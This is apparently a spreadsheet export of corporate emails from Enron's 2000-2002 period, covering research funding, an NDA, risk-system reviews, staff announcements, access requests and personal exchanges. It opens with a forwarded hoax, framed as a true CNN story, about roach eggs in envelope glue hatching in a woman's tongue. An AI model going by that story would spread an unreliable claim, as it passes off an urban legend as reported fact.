&gt; found nothing wrong. Her tongue was not sore or anything._x000D_
&gt;_x000D_
&gt; A couple of days later, her tongue started to swell more, and it began_x000D_
&gt; to get really sore, so sore, that she could not eat. She went back to_x000D_
&gt; the hospital, and demanded something be done. The doctor, took an_x000D_
&gt; x-ray of her tongue, and noticed a lump. He prepared her for minor_x000D_
&gt; surgery. When the doctor cut her tongue open, a live roach crawled_x000D_
&gt; out. There were roach eggs on the seal of the envelope. The egg was_x000D_
&gt; able to hatch inside of her tongue, because of her saliva. It was warm_x000D_
&gt; and moist..._x000D_
&gt;_x000D_
&gt; This is a true story reported on CNN Andy Hume wrote: Hey, I used to_x000D_
&gt; work in an envelope factory. You wouldn't believe the.....things that_x000D_
&gt; float around in those gum applicator trays. I haven't licked an_x000D_
&gt; envelope for years_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 18:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Enron/Stanford Program</t>
  </si>
  <si>
    <t>Content-Transfer-Encoding: 7bit_x000D_
Return-Path: &lt;bambos@stanford.edu&gt;_x000D_
Received: from  rly-zc05.mx.aol.com (rly-zc05.mail.aol.com [172.31.33.5]) by _x000D_
air-zc04.mail.aol.com (v76_r1.8) with ESMTP; Mon, 16 Oct 2000 21:33:05 -0400_x000D_
Received: from  smtp.Stanford.EDU (smtp.stanford.edu [171.64.14.23]) by _x000D_
rly-zc05.mx.aol.com (v76_r1.19) with ESMTP; Mon, 16 Oct 2000 21:32:25 -0400_x000D_
Received: from stanford.edu (dialup-209.245.138.193.SanJose1.Level3.net _x000D_
[209.245.138.193]) by smtp.Stanford.EDU (8.9.3/8.9.3) with ESMTP id SAA18641; _x000D_
Mon, 16 Oct 2000 18:32:23 -0700 (PDT)_x000D_
Message-ID: &lt;39EBADA6.47D18EF5@stanford.edu&gt;_x000D_
Date: Mon, 16 Oct 2000 18:38:46 -0700_x000D_
From: Nick Bambos &lt;bambos@stanford.edu&gt;_x000D_
X-Mailer: Mozilla 4.7 [en] (Win98; I)_x000D_
X-Accept-Language: en,el_x000D_
MIME-Version: 1.0_x000D_
To: VKaminski@aol.com_x000D_
Subject: Re: Enron/Stanford Program_x000D_
References: &lt;39.b427d0d.2716959d@aol.com&gt;_x000D_
Content-Type: text/plain; charset=us-ascii_x000D_
_x000D_
Vince,_x000D_
_x000D_
No problem at all. I fully understand._x000D_
_x000D_
The only glitch is that I will be in Europe next week, leaving this Friday_x000D_
and coming back next Sunday. I'm visiting several companies and universities._x000D_
Is it an option for you to schedule your visit to Stanford the first week of_x000D_
November, so that we can get together and talk about the research program_x000D_
etc. ?_x000D_
_x000D_
On another matter now. I have been in contact with Stinson regarding the_x000D_
program_x000D_
funds. I am under great pressure from my Department to finalize Giuseppe's_x000D_
RAship and I am way beyond the deadline. I understand that Paul Racicot_x000D_
will fund the project and Stinson is doing anything he can to make this_x000D_
happen._x000D_
_x000D_
May I solicit your help and intervention to Paul to have the process_x000D_
expedited?_x000D_
I look bad to my colleagues here for not honoring my commitments to the_x000D_
students_x000D_
I had promised to support and the pressure on me is mounting exponentially!_x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Nick_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
VKaminski@aol.com wrote:_x000D_
&gt;_x000D_
&gt; Nick,_x000D_
&gt;_x000D_
&gt; Sorry, change of plans. I had to move my trip to the Bay area by one week._x000D_
&gt; Any evening would work for me between Friday, October the 20st and Sunday,_x000D_
&gt; October the 22nd._x000D_
&gt;_x000D_
&gt; Please, accept my apologies. I hope we can meet for dinner on of these days._x000D_
&gt;_x000D_
&gt; Vince</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 01:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>NDA - Carr Futures, Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">Tana,_x000D_
I didn't have much luck with the gentlemen in London.  His counterpart in the _x000D_
US is Jim Paul and he'll try to get it signed.  I wasn't sure if you need to _x000D_
change anything in the document for the US.  Please email a revised copy to _x000D_
jpaul@carrfut.com.  His mail address is Carr Futures, Inc., One World Trade _x000D_
Center, 92nd Floor, NY, NY 10048._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dan_x000D_
---------------------- Forwarded by Daniel Diamond/HOU/ECT on 03/07/2001 _x000D_
09:46 AM ---------------------------_x000D_
From: Tana Jones on 02/22/2001 10:41 AM_x000D_
To: mthomas@carrfut.com_x000D_
cc: Daniel Diamond/HOU/ECT@ECT, Mark Greenberg/NA/Enron@ENRON _x000D_
Subject: NDA - Carr Futures, Inc._x000D_
_x000D_
At the request of Dan Diamond, I am attaching our proposed form of _x000D_
Non-Disclosure Agreement.   If the enclosed meets with your approval, please _x000D_
execute the agreement and return it to me via fax no. (713) 646-3490.  I will _x000D_
then have it executed by an officer of EnronOnline.  If you have any comments _x000D_
or questions please do not hesitate to call me at (713) 853-3399, or Mark _x000D_
Greenberg, Senior Counsel, at (713) 345-8897.  We look forward to hearing _x000D_
from you._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 08:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Contact info. during my vacation</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/05/2001 _x000D_
04:23 PM ---------------------------_x000D_
_x000D_
_x000D_
Pinnamaneni Krishnarao_x000D_
12/20/2000 11:29 AM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Sandeep _x000D_
Kohli@Enron, Osman Sezgen/HOU/EES@EES, Seksan Kiatsupaibul/HOU/EES@EES, _x000D_
Praveen Mellacheruvu/HOU/EES@EES, Shane Green/HOU/EES@EES, Roman _x000D_
Zadorozhny/HOU/EES@EES, Stinson Gibner/HOU/ECT@ECT, Chonawee _x000D_
Supatgiat/Corp/Enron@Enron, Anita DuPont/NA/Enron@ENRON, Youyi _x000D_
Feng/NA/Enron@Enron, Kimberly Watson/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Contact info. during my vacation_x000D_
_x000D_
Cell:   011-91-984-9022360 (try this first)_x000D_
Hyderabad:  011-91-40-7114833_x000D_
Vijayawada: 011-91-866-430928 (Dec 28-Jan 8)_x000D_
Bombay office:  011-91-982-1038711_x000D_
_x000D_
Also, I will be checking my email regularly (as long as I can get the _x000D_
connected). Have a great Christmas and holidays. I will see you all in the _x000D_
new year!_x000D_
_x000D_
Best wishes_x000D_
Krishna._x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 01:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Good morning/afternoon</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
The phone number for Ken Lay is (713) 853-6773._x000D_
My recommendation is to call Mark Palmer first and discuss the book_x000D_
with him. His recommendation will open the door. I shall mention this to him_x000D_
as well. Mark's phone number is   (713) 853-4738._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"John D. Martin" &lt;J_Martin@baylor.edu&gt; on 03/30/2001 12:12:50 PM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: Good morning/afternoon_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
one of my colleagues here at Baylor is writing a book about "the business_x000D_
of heaven" in which he interviews prominent business leaders.  Bob Darden_x000D_
is his name and he's a former journalist and nice guy.  He would like to_x000D_
contact Ken Lay about being one of his interviews.  Do you think this is_x000D_
possible?  If so, could you give me an address/phone numbers that Bob might_x000D_
use to contact Ken's secretary about setting up an interview?_x000D_
_x000D_
If this is in any way "not ok" please just say so._x000D_
_x000D_
See ya,_x000D_
_x000D_
John_x000D_
_x000D_
&gt;Date: Fri, 30 Mar 2001 11:35:03 -0600_x000D_
&gt;From: Robert Darden &lt;rfd3@flash.net&gt;_x000D_
&gt;Subject: Yo!_x000D_
&gt;X-Sender: "Robert Darden" &lt;rfd3@pop.flash.net&gt; (Unverified)_x000D_
&gt;To: J_Martin@baylor.edu_x000D_
&gt;Organization: The Door_x000D_
&gt;X-Mailer: Mozilla 4.04 [en]C-FLASHNET  (Win95; I)_x000D_
&gt;_x000D_
&gt;Hi John -- I enjoyed our meeting yesterday. This looks VERY promising._x000D_
&gt;Meanwhile, as I mentioned at the table, I'm getting a little nervous_x000D_
&gt;about the book that is due June 1._x000D_
&gt;One of the names on our "wish" list of interviewees for "The Business of_x000D_
&gt;Heaven" is Ken Lay at Enron._x000D_
&gt;Would it be possible for you to give me a good address and phone number_x000D_
&gt;for Mr. Lay's office?_x000D_
&gt;And may I mention your name in the cover letter?_x000D_
&gt;I would be forever indebted. I might even buy the next lunch._x000D_
&gt;Bob_x000D_
&gt;P.S. Thanks for sharing your concerns about church yesterday, too. I'm_x000D_
&gt;genuinely sorry things didn't work out better and feel more than a_x000D_
&gt;little embarrassed that I didn't work harder to make you guys feel more_x000D_
&gt;welcome and connected. On the other hand, please know that Mary and I_x000D_
&gt;will always love you and consider you both friends. I know you'll be_x000D_
&gt;happy at Lake Shore -- even as we miss you at 7th!_x000D_
&gt;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_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 02:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stephanie.sever@enron.com', 'melba.lozano@enron.com'})</t>
  </si>
  <si>
    <t>Blanco restricted products</t>
  </si>
  <si>
    <t>i still cannot see the blanco physical index restricted products on the web.  _x000D_
my ID is ADM44643.  can you please get me access as soon as possible.  _x000D_
thanks.</t>
  </si>
  <si>
    <t>Thu, 14 Feb 2002 15:23:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'m..driscoll@enron.com', 'matt.motley@enron.com'})</t>
  </si>
  <si>
    <t>Iron Mtn</t>
  </si>
  <si>
    <t xml:space="preserve">Guys,_x000D_
_x000D_
The Iron Mtn question you raised early is a little sticky.  Grace may be able to help you, but over 300 boxes were shipped to Iron Mtn today.  Good luck!_x000D_
_x000D_
___________________________x000D_
Julie Kearney_x000D_
ENA HR Manager_x000D_
503) 475-1407 (Mobile)_x000D_
503) 464-7404 (Work)_x000D_
julie.kearney@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 17:38:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jake.thomas@enron.com', 'kourtney.nelson@enron.com', 'jonalan.page@enron.com', 'jim.buerkle@enron.com', 'paul.choi@enron.com', 'laura.wente@enron.com', 'tim.heizenrader@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'stewart.rosman@enron.com', 'michael.etringer@enron.com', 'f..calger@enron.com', 'jeff.richter@enron.com', 'jim.gilbert@enron.com', 'bill.williams@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'g..slaughter@enron.com', 'todd.perry@enron.com', 'john.van@enron.com', 'diana.scholtes@enron.com', 'elliot.mainzer@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>REMINDER - Interview Training</t>
  </si>
  <si>
    <t>_x000D_
REMINDER!_x000D_
_x000D_
Interview Training will be held in the Mt Hood Conference Room at 2:00 PM Today!_x000D_
_x000D_
See you there!</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 16:08:39 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request kam.keiser@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for your request. You will be notified by email when your request has been processed. You can check the progress of your request by clicking http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000081716&amp;Page=MyReq._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 19:34:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ken Lay Up Front</t>
  </si>
  <si>
    <t>Ken Lay has a special video message for you about the Sept. 11 tragedy.  Please go to "Up Front" at &lt;http://home.enron.com/upfront/&gt; to access it.  An audio option and transcript are available for employees who cannot access the video._x000D_
_x000D_
"Up Front" will feature open, honest and timely video messages from the Office of the Chairman and Enron management about what's going on around the company.  _x000D_
_x000D_
If you encounter technical difficulties, please contact your IT technical support representative.</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 14:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Doorstep and Risk Reviews</t>
  </si>
  <si>
    <t xml:space="preserve">I don't think that the doorstep reviews are the right venue for this.  I _x000D_
believe that to address what seems to be David's concerns would be better _x000D_
handled with an appropriate person deemed to lead a special project in a _x000D_
directed timeframe with a well defined scope.  We purposefully utilize _x000D_
differing personal on the doorstep reviews and it would seem that concerns _x000D_
over proper valuation should be addresses in a timeframe that is not _x000D_
dependent on the schedule of doorstep reviews around the world.  _x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  David Port @ ENRON                                                     _x000D_
        01/12/2001 12:49 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Shona Wilson/NA/Enron@Enron_x000D_
cc: Cassandra Schultz/NA/Enron@Enron, Bjorn Hagelmann/HOU/ECT@ECT, Rudi _x000D_
Zipter/HOU/ECT@ECT, Vladimir Gorny/HOU/ECT@ECT, Oliver Gaylard/LON/ECT@ECT, _x000D_
Lloyd Fleming/LON/ECT@ECT, Ted Murphy/LON/ECT@ECT, Sally Beck/HOU/ECT@ECT _x000D_
Subject: Re: Doorstep and Risk Reviews  _x000D_
_x000D_
Whatever we need to do, we should do._x000D_
_x000D_
_x000D_
_x000D_
Shona Wilson_x000D_
01/12/2001 12:26 PM_x000D_
To: David Port/Market Risk/Corp/Enron@ENRON_x000D_
cc: Cassandra Schultz/NA/Enron@Enron, Bjorn Hagelmann/HOU/ECT@ECT, Rudi _x000D_
Zipter/HOU/ECT@ECT, Vladimir Gorny/HOU/ECT@ECT, Oliver Gaylard/LON/ECT@ECT, _x000D_
Lloyd Fleming/LON/ECT@ECT, Ted Murphy/LON/ECT@ECT, Sally Beck/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Doorstep and Risk Reviews  _x000D_
_x000D_
Doorstep is a joint MRM RAC and Energy Ops review process.  If we want to _x000D_
include a full review of all the mtm methodologies we need to start building _x000D_
this into the doorsteps by ensuring that the RAC person attending the _x000D_
doorstep has the relevant experience to perform this review and that the time _x000D_
scheduled to do the review is adequate._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Cassandra Schultz/NA/Enron@Enron, Shona Wilson/NA/Enron@Enron, Bjorn _x000D_
Hagelmann/HOU/ECT@ECT, Rudi Zipter/HOU/ECT@ECT, Vladimir Gorny/HOU/ECT@ECT, _x000D_
Oliver Gaylard/LON/ECT@ECT, Lloyd Fleming/LON/ECT@ECT_x000D_
cc: Ted Murphy/LON/ECT@ECT _x000D_
_x000D_
Subject: Doorstep and Risk Reviews_x000D_
_x000D_
_x000D_
I am getting a strong sense that there are many holes, patches and _x000D_
workarounds in the upstream risk systems, relating to their ability to _x000D_
reflect accurately the valuation, and the risk attached to the products that _x000D_
get traded._x000D_
_x000D_
I would like to use the doorstep process and the risk review process to _x000D_
establish precisely what those holes are, if we don't already know. Here is _x000D_
an example:_x000D_
_x000D_
 "All of our systems value options at-the-money, regardless of moneyness." _x000D_
True or False ?_x000D_
_x000D_
Can you please include this concept in those exercises. The aim is, at least _x000D_
by the end of Q1 we can put our hands on a summary of everything._x000D_
_x000D_
Thanks_x000D_
DP_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Nov 0001 14:30:05 -0800 (PST)</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - November 01</t>
  </si>
  <si>
    <t>The Approval status has changed on the following report:_x000D_
_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: November 01_x000D_
Report Total: $7,131.10_x000D_
Amount Due Employee: $7,131.10_x000D_
Amount Approved: $7,131.10_x000D_
Amount Paid: $0.00_x000D_
Approval Status: Pending_x000D_
Payment Status: Pending_x000D_
_x000D_
_x000D_
To review this expense report, click on the following link for Concur Expense._x000D_
http://expensexms.enron.com</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 12:04:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>DispatchScout unresolveable responses - 7/18/2001 2:04:59 PM</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Error in response file Response_20010713_1046.csv_x000D_
Declined by ISO..._x000D_
Details: 7/13/2001,"10:40 - 10:50","CARBGN_6_UNIT 1",,SUPP,SEQ,0,0,24.94,0,9,64.04,0.06,0,16,DECLINE,10,49,EPMI_SteveMerriss,N</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 10:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Digital Power Demand: JP Morgan Report</t>
  </si>
  <si>
    <t xml:space="preserve">Please post the JP MOrgan doc. on our site_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 09/27/2000 05:22 PM -----_x000D_
_x000D_
	Rob Bradley_x000D_
	09/25/2000 10:31 AM_x000D_
		 _x000D_
		 To: Margaret Carson/Corp/Enron@ENRON, James D Steffes/NA/Enron@Enron_x000D_
		 cc: Mark Palmer/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron_x000D_
		 Subject: Digital Power Demand: JP Morgan Report_x000D_
_x000D_
The JP Morgan report below gives further credence to the Mills/Huber thesis _x000D_
of digital-age power growth.  The in-the-trenches story is different from _x000D_
some of the academic studies by the conservation mavens._x000D_
_x000D_
- Rob_x000D_
_x000D_
_x000D_
 - jp morgan.pdf_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 04:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'zhiyong.wei@enron.com', 'geoff.storey@enron.com', 'karima.husain@enron.com'})</t>
  </si>
  <si>
    <t>REVISED MEETING NOTES</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached revision to the meeting notes.  You will see the _x000D_
change indicated in RED under Issue #2, Gas Daily.  We want to put this item _x000D_
on HOLD for now because there are more implications to this change that we _x000D_
need to resolve before coding begins.  The focus for now should be on putting _x000D_
physical positions in TDS--identifying all issues associated with it, resolve _x000D_
questions on where/how to get the position data, what should be filtered, _x000D_
design of the new screens, etc.  _x000D_
_x000D_
Also, for your information--from now on we will be including Jeff Gossett and _x000D_
Russ Severson in our weekly meetings as I believe they can help tremendously _x000D_
with position reporting and how we currently get information from Sitara, _x000D_
CPR, ERMS &amp; TAGG.  I will send you all an e-mail on Monday letting you know _x000D_
the time and place of next week's meeting.  Normally I want to hold the _x000D_
meetings on Wednesday afternoons; however--next week I may have to move it to _x000D_
Tuesday.  I will let you know first thing Monday morning.  Let me know if you _x000D_
have any questions or concerns._x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 07:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Fundamental Operating Standards</t>
  </si>
  <si>
    <t xml:space="preserve">This is helpful.  Can you also distribute the DASH system, why we use it, how _x000D_
to use it, and approvals needed for deals?  Thanks.   Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brent A Price_x000D_
11/09/2000 03:39 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT, John L _x000D_
Nowlan/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, Mark Tawney/HOU/ECT@ECT, _x000D_
Jere C Overdyke/HOU/ECT@ECT, Gary Hickerson/HOU/ECT@ECT, Eric _x000D_
Gonzales/LON/ECT@ECT, Rick Bergsieker/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Daniel Reck/HOU/ECT@ECT, Larry Lawyer/NA/Enron@Enron_x000D_
cc: Sally Beck/HOU/ECT@ECT, Richard Causey/Corp/Enron@ENRON, Scott _x000D_
Earnest/HOU/ECT@ECT, Kevin Sweeney/HOU/ECT@ECT, D Todd Hall/HOU/ECT@ECT, _x000D_
Sheila Glover/HOU/ECT@ECT, Eric Groves/HOU/ECT@ECT _x000D_
Subject: Fundamental Operating Standards_x000D_
_x000D_
Attached for your review are the fundamental operating standards and controls _x000D_
that have been developed by the Wholesale Services group.  These standards _x000D_
are to be met by all Enron offices and by each functional group within the _x000D_
operations process.  Qualitative standards should be viewed as the basic _x000D_
measures to be taken when opening a new office or trading a new commodity.  _x000D_
Statistics measuring compliance with quantitative standards will be monitored _x000D_
on a daily basis and any issues that arise will be addressed immediately._x000D_
_x000D_
As business unit heads, you play a critical role in working with Operations _x000D_
to ensure that proper controls are in place and working effectively.  Please _x000D_
review this document and let me know if you have any questions or wish to _x000D_
discuss further._x000D_
_x000D_
Regards,_x000D_
_x000D_
Brent_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 06:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bonnie.white@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Here is a proposed modification of the indemnification language based on our _x000D_
telephone conversation earlier today:_x000D_
_x000D_
5. Indemnification. Company represents that it is a successor corporation to _x000D_
Enron Milford, Inc. and that the Certificate of Incorporation of Enron _x000D_
Milford, Inc. on file in the Division of Corporations Files of the Secretary _x000D_
of State, State of Delaware, applies to Company.  Company further represents _x000D_
that it will act in good faith in investigating and making a determination _x000D_
with respect to any claim for indemnification made by Consultant pursuant to _x000D_
the provisions of the Certificate of Incorporation should an indemnifiable _x000D_
event arise._x000D_
_x000D_
Let me know what you think.  Thanks._x000D_
_x000D_
Bonnie J. White_x000D_
Enron Litigation Unit_x000D_
1400 Smith St., Suite 4824_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-7244_x000D_
Fax: (713) 853-6576 </t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 13:22:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kltaylor@duke-energy.com', 'christina_122367@hotmail.com', 'sbush@enserco.com', 'bveazey@obn.state.ok.us', 'larry.bevans@elpaso.com', 'flucci6521@aol.com', 'joey_brewer@leathercenter.com', 'donbratcher@msn.com', 'john.d.williamson@us.arthurandersen.com', 'lisab@int.iwhm.com', 'mgladwin@cisco.com', 'webb@cisaustin.org', 'marian_hundt@br-inc.ca', 'lpaul13@uswest.net', 'dvywvy@aol.com', 'kirotate@aol.com', 'bob.williams@elpaso.com'})</t>
  </si>
  <si>
    <t>FW: Did or Didn't He!?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Did he or didn't he?  You decide!_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Harrison, Tyrell _x000D_
Sent: Thursday, November 15, 2001 10:18 AM_x000D_
To: Felicia Garcia (E-mail); Lucci, Paul T.; Whitt, Mark; Staab,_x000D_
Theresa; Felling, Amy_x000D_
Subject: FW: Did or Didn't He!?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Peter Scoffin [mailto:scoffin1@yahoo.com]_x000D_
Sent: Thursday, November 15, 2001 9:45 AM_x000D_
To: Maggie SCOFFIN; Cindy Shae Simmons; Mark Steinhauer; Chris UK Zook;_x000D_
Max Fulton; Harrison, Tyrell; Codey James; Eric Kinzler; Cari Lanfield;_x000D_
Adam Lewis; Kim Maciel; Kimberly Micek; ridgeway oscar; Becky Scoffin;_x000D_
Jay Alexander; Jay Alexander; Dustin B. Allen; Justin Ryan Andrews;_x000D_
Brian Bengston; Marchann Marie Bittler; Cameron Cryans; Angie_x000D_
Cummings/jenson_x000D_
Subject: Did or Didn't He!?_x000D_
_x000D_
_x000D_
_x000D_
Note: forwarded message attached._x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Find the one for you at Yahoo! Personals_x000D_
http://personals.yahoo.com_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;eric.smith@qwest.com&gt;_x000D_
Date: Thursday, November 15, 2001 2:58:44 GMT_x000D_
Subject: _x000D_
_x000D_
 _x000D_
   _x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 13:54:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>P&amp;SM Organization Announcement</t>
  </si>
  <si>
    <t>_x000D_
I am pleased to announce the following organizational changes within Enron Transportation Services, Operations Support Services.  _x000D_
_x000D_
Fleet and Procurement Card Administration_x000D_
Cheri Sublet has accepted the position of Sr. Fleet Specialist effective October 16th, 2001.  Cheri comes to ETS from Global Strategic Sourcing, Travel and Transportation, where she was responsible for Enron purchasing card coordination as well as fleet sourcing.  She has been a member of the National Association of Fleet Administrators (NADA) for 14 years.  Cheri brings 16 years of fleet and procurement experience to ETS and with her strategic sourcing knowledge will be a valuable asset to ETS. _x000D_
_x000D_
As earlier announced, Mary Ann Johnson will be assuming the role of Purchasing Card Coordinator for ETS.  Mary Ann will be responsible for the administration, monitoring and reporting of all purchasing card activity as related to the ET Purchasing Card Procedure, as well as recommending enhanced use of the card._x000D_
_x000D_
Cheri Sublet and Mary Ann Johnson will report to Bruce Martin, ETS Fleet Manager.  _x000D_
_x000D_
SR. Business Analyst_x000D_
Amanda Becker has accepted the position of Business Analyst effective November 1, 2001, reporting to me.  Amanda comes to ETS from Global Strategic Sourcing where she served as Sr. Business Analyst.  Amanda has eight years experience in inventory and logistics analysis, purchasing and project management.  She has a BBA, Operations Management, University of Houston and is APICS Certified in Production and Inventory Management. _x000D_
_x000D_
Please welcome Cheri Sublet and Amanda Becker to Enron Transportation Services.  _x000D_
_x000D_
_x000D_
Shirley Jo Dickens-Wilson_x000D_
Director_x000D_
ETS - Procurement and Supply Management_x000D_
Office: 713-646-7545_x000D_
shirley.jo.dickens-wilson@enron.com</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 03:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.nguyen@enron.com', 'georgeanne.hodges@enron.com', 'jan.johnson@enron.com', 'sally.beck@enron.com', 'hope.vargas@enron.com', 'gary.peng@enron.com', 'cassandra.schultz@enron.com', 'tatiana.waxler@enron.com', 'shona.wilson@enron.com'})</t>
  </si>
  <si>
    <t>The Jedi swap VaR was moved from non-trading securities to trading securities._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
Eugenio</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 08:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Galveston</t>
  </si>
  <si>
    <t>Dana, If you need help preparing for the trip please let me know._x000D_
As far as the hair thing I have to have mine done tonight for sure,_x000D_
tomorrow is bible study, Thursday Chanel has a class, she'll already_x000D_
miss Saturday because they will be out of town, so if you can't do it for me_x000D_
let me know_x000D_
believe me I understand. It's just convenient because you're right there,_x000D_
plus those lil-nubs_x000D_
do a wondrous job. Oh! please let me have a copy of the directions for_x000D_
back-up just in case_x000D_
we'll have an extra one. Please advise :&gt;_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dana.Davis@enron.com [mailto:Dana.Davis@enron.com]_x000D_
Sent: Tuesday, October 17, 2000 10:42 AM_x000D_
To: Cmontgomery@kmg.com_x000D_
Subject: Galveston_x000D_
_x000D_
_x000D_
_x000D_
I will be taking a 1/2 day of vacation on Friday.  I am trying to do the_x000D_
majority of the necessary preparation for our trip before Friday.  I am_x000D_
also still trying to decide whether or not we will do hair tonight.  Do you_x000D_
already have the perm?  I did get some type of directions from Denise too._x000D_
I am printing them now and placing them in my purse so we will have them.</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brianp@aiglincoln.com.pl'})</t>
  </si>
  <si>
    <t>Dude,_x000D_
_x000D_
We are having another baby in November, but I think I told you that when I_x000D_
spoke with you in June.  I would like to chat just to catch up. Office_x000D_
number is (48 22)528-5000 and Home is (48 22)642-8902.  Looking forward to_x000D_
it._x000D_
_x000D_
Brian_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Richard.B.Sanders@enron.com&gt;_x000D_
To: Brian Patterson &lt;brianp@aiglincoln.com.pl&gt;_x000D_
Sent: Monday, September 18, 2000 2:37 PM_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; Somehow, I have lost your telephone no.    I was going to call you to get_x000D_
&gt; an update---or do you have anything to tell me?_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Fri, 28 Apr 2000 05:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.germany@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>Final May'00 FOM volumes</t>
  </si>
  <si>
    <t>Chris and Scott--Here are CES's final May '00 baseload FOM volumes.   Please_x000D_
call me if you have questions/problems._x000D_
_x000D_
Please note the increase in the Transco ESS storage injection for May._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Kinney_x000D_
Ph:  703-561-6339_x000D_
Fax:  703-561-7317_x000D_
_x000D_
 - May00_FOM_Final.xls.xls</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 06:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 537565.01</t>
  </si>
  <si>
    <t xml:space="preserve">She changed it to price 360.00_x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
